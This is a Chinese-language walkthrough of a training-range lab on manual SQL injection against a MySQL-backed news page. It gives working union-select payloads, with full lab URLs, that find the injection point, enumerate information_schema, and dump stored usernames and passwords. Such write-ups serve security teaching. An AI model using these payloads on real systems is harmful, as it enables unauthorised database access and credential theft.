墨者靶场 SQL手工注入漏洞测试(MySQL数据库)
-
首先访问链接:可以看到是要找到登陆的用户和密码
-
找到是否有注入点:124.70.64.48:47756/new_list.php?id=1
可以看到显示的页面
3. 124.70.64.48:47756/new_list.php?id=1 and 1=1 页面显示正常
-
124.70.64.48:47756/new_list.php?id=1 and 1=2 页面显示异常 可以判断id是存在注入点的
-
查找数量:124.70.64.48:47756/new_list.php?id=1 order by 204 尝试1234都是正常的,到了5就发现了异常,所以可以确定数量是4
-
手工注入使用union联合查询:
124.70.64.48:47756/new_list.php?id=-1 union select 1,2,3,4
很容易就可以看到页面中的2和3,就可以猜测是这两个地方有注入
-
124.70.64.48:47756/new_list.php?id=-1 union select 1,database(),3,4(将2的地方改成查询数据库试试)发现找到了数据库的名称
-
改3:124.70.64.48:47756/new_list.php?id=-1 union select 1,database(),version(),4
可以看到数据库的版本号了
同理查询数据库用户和数据库类型:可以看到是root用户名和Linux系统
利用information_schema数据库查询:几乎包含所有的表名等信息;
information_schema.tables:记录所有表名信息的表
information_schema.conlumus:记录所有列名信息的表
9.查询表名:
124.70.64.48:47756/new_list.php id=-1 union select 1,table_name,3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’
10. 查询表下的列名:124.70.64.48:47756/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=‘StormGroup_member’
11.查询指定数据:
124.70.64.48:47756/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member
124.70.64.48:47756/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member limit 1,1 有两个账号,在最后加limit 0,1 尝试到1,1 2,1最后发现有两个mozhe账号密码
12. 最后成功登录:
